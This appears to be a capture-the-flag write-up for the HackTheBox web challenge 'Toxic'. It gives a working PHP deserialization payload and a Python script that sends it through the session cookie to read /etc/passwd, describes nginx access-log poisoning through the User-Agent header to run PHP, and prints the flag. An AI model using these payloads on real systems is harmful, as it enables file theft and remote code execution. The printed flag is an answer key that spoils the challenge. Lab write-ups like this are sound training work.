Toxic | HTB Web Challenge
Web
In the given source code we can spot that it is vulnerable to deserialization
PageModel
have magic method __destruct()
to exploite Deserialization
payload=
O:9:"PageModel":1:{s:4:"file";s:11:"/etc/passwd";}
import requests
from itsdangerous import base64_encode
a = "PageModel"
b = "/etc/passwd"
payload = 'O:'+str(len(a))+':"'+a+'":1:{s:4:"file";s:'+str(len(b))+':"'+b+'";}'
payload = base64_encode(payload).decode()
r = requests.get("http://83.136.249.57:52345/",cookies={"PHPSESSID": payload},proxies={"http":"http://127.0.0.1:8080/"})
print(r.text)
The flag name is random so we need to find a way around
we can find the path of /etc/nginx/nginx.conf
in Dockerfile
Reading this file we get the path to access log /var/log/nginx/access.log
In access log we see that User-agent is printed
We can try injecting php code:
and it works 🥲 Let's get flag
Flag: HTB{P0i5on_1n_Cyb3r_W4rF4R3?!}
:octocat: Happy Hacking :octocat:
Last updated
Was this helpful?